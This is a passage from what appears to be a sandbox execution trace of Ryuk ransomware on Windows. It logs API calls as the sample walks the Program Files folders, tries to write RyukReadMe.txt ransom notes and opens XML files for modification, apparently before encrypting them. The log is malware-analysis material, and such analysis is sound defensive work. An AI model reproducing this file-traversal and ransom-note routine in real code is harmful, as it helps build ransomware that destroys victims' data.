[0138.210] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0138.210] SetLastError (dwErrCode=0x0) [0138.210] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\runtime\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.210] GetLastError () returned 0x5 [0138.210] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0138.210] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.210] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0138.210] FindClose (in: hFindFile=0x3a2d60 | out: hFindFile=0x3a2d60) returned 1 [0138.210] SetLastError (dwErrCode=0x0) [0138.210] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.211] GetLastError () returned 0x5 [0138.211] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0138.211] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.211] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0138.211] FindClose (in: hFindFile=0x3a2d00 | out: hFindFile=0x3a2d00) returned 1 [0138.211] SetLastError (dwErrCode=0x0) [0138.211] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Sync Framework\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft sync framework\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.211] GetLastError () returned 0x5 [0138.211] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0138.211] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.211] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0138.211] SetLastError (dwErrCode=0x0) [0138.211] CreateFileW (lpFileName="C:\\Program Files\\RyukReadMe.txt" (normalized: "c:\\program files\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.211] GetLastError () returned 0x5 [0138.211] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0138.211] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.211] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Synchronization Services\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3a2d00 [0138.211] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0138.211] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0138.211] SetLastError (dwErrCode=0x0) [0138.211] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Synchronization Services\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft synchronization services\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.212] GetLastError () returned 0x5 [0138.212] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0138.212] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.212] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2d60 [0138.212] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0138.212] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0138.212] SetLastError (dwErrCode=0x0) [0138.212] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft synchronization services\\ado.net\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.212] GetLastError () returned 0x5 [0138.212] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0138.212] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.212] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2dc0 [0138.214] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.214] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.214] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.214] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.214] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0138.214] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0138.215] SetLastError (dwErrCode=0x0) [0138.215] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft synchronization services\\ado.net\\v1.0\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.218] GetLastError () returned 0x5 [0138.218] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0138.218] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.218] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0138.218] FindClose (in: hFindFile=0x3a2d60 | out: hFindFile=0x3a2d60) returned 1 [0138.218] SetLastError (dwErrCode=0x0) [0138.218] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft synchronization services\\ado.net\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.218] GetLastError () returned 0x5 [0138.218] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0138.218] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.218] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0138.218] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0138.218] FindClose (in: hFindFile=0x3a2d00 | out: hFindFile=0x3a2d00) returned 1 [0138.218] SetLastError (dwErrCode=0x0) [0138.218] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Synchronization Services\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft synchronization services\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.218] GetLastError () returned 0x5 [0138.219] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0138.219] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.219] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0138.219] SetLastError (dwErrCode=0x0) [0138.219] CreateFileW (lpFileName="C:\\Program Files\\RyukReadMe.txt" (normalized: "c:\\program files\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.219] GetLastError () returned 0x5 [0138.219] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0138.219] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.219] FindFirstFileW (in: lpFileName="C:\\Program Files\\MSBuild\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3a2d00 [0138.219] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0138.219] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0138.219] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0138.219] SetLastError (dwErrCode=0x0) [0138.219] CreateFileW (lpFileName="C:\\Program Files\\MSBuild\\RyukReadMe.txt" (normalized: "c:\\program files\\msbuild\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.219] GetLastError () returned 0x5 [0138.219] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0138.219] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.219] FindFirstFileW (in: lpFileName="C:\\Program Files\\MSBuild\\Microsoft\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2d60 [0138.220] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0138.220] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0138.220] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0138.220] FindClose (in: hFindFile=0x3a2d60 | out: hFindFile=0x3a2d60) returned 1 [0138.220] SetLastError (dwErrCode=0x0) [0138.220] CreateFileW (lpFileName="C:\\Program Files\\MSBuild\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\program files\\msbuild\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.220] GetLastError () returned 0x5 [0138.220] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0138.220] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.220] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0138.220] FindClose (in: hFindFile=0x3a2d00 | out: hFindFile=0x3a2d00) returned 1 [0138.220] SetLastError (dwErrCode=0x0) [0138.220] CreateFileW (lpFileName="C:\\Program Files\\MSBuild\\RyukReadMe.txt" (normalized: "c:\\program files\\msbuild\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.221] GetLastError () returned 0x5 [0138.221] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0138.221] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.221] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0138.221] SetLastError (dwErrCode=0x0) [0138.221] CreateFileW (lpFileName="C:\\Program Files\\RyukReadMe.txt" (normalized: "c:\\program files\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.221] GetLastError () returned 0x5 [0138.221] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0138.221] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.221] FindFirstFileW (in: lpFileName="C:\\Program Files\\Reference Assemblies\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3a2d00 [0138.221] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0138.221] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0138.221] SetLastError (dwErrCode=0x0) [0138.221] CreateFileW (lpFileName="C:\\Program Files\\Reference Assemblies\\RyukReadMe.txt" (normalized: "c:\\program files\\reference assemblies\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.221] GetLastError () returned 0x5 [0138.221] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0138.221] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.221] FindFirstFileW (in: lpFileName="C:\\Program Files\\Reference Assemblies\\Microsoft\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2d60 [0138.222] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0138.222] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0138.222] SetLastError (dwErrCode=0x0) [0138.222] CreateFileW (lpFileName="C:\\Program Files\\Reference Assemblies\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\program files\\reference assemblies\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.222] GetLastError () returned 0x5 [0138.222] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0138.222] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.222] FindFirstFileW (in: lpFileName="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2dc0 [0138.222] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.222] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.222] SetLastError (dwErrCode=0x0) [0138.222] CreateFileW (lpFileName="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\RyukReadMe.txt" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.222] GetLastError () returned 0x5 [0138.222] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0138.222] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.222] FindFirstFileW (in: lpFileName="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e20 [0138.224] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.224] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.224] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.224] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.224] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.224] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.224] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.224] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.224] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.224] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.224] SetLastError (dwErrCode=0x0) [0138.224] CreateFileW (lpFileName="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RyukReadMe.txt" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.224] GetLastError () returned 0x5 [0138.224] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.224] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.224] FindFirstFileW (in: lpFileName="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2e80 [0138.224] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.224] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.224] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.225] SetFileAttributesW (lpFileName="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\FrameworkList.xml", dwFileAttributes=0x80) returned 0 [0138.225] CreateFileW (lpFileName="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\FrameworkList.xml" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\redistlist\\frameworklist.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.225] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.225] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.225] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0138.226] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0138.226] SetLastError (dwErrCode=0x0) [0138.226] CreateFileW (lpFileName="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\RyukReadMe.txt" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\redistlist\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.226] GetLastError () returned 0x5 [0138.226] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.226] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.226] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.226] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.226] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.226] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.226] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.226] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.226] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.226] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.226] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.226] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.226] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.226] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.226] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.226] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.226] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.226] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.226] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.226] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.226] SetFileAttributesW (lpFileName="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WinFXList.xml", dwFileAttributes=0x80) returned 0 [0138.226] CreateFileW (lpFileName="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WinFXList.xml" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\winfxlist.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.227] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.227] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.227] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0138.227] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0138.227] SetLastError (dwErrCode=0x0) [0138.227] CreateFileW (lpFileName="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RyukReadMe.txt" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.227] GetLastError () returned 0x5 [0138.227] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0138.227] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.227] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.227] SetLastError (dwErrCode=0x0) [0138.227] CreateFileW (lpFileName="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\RyukReadMe.txt" 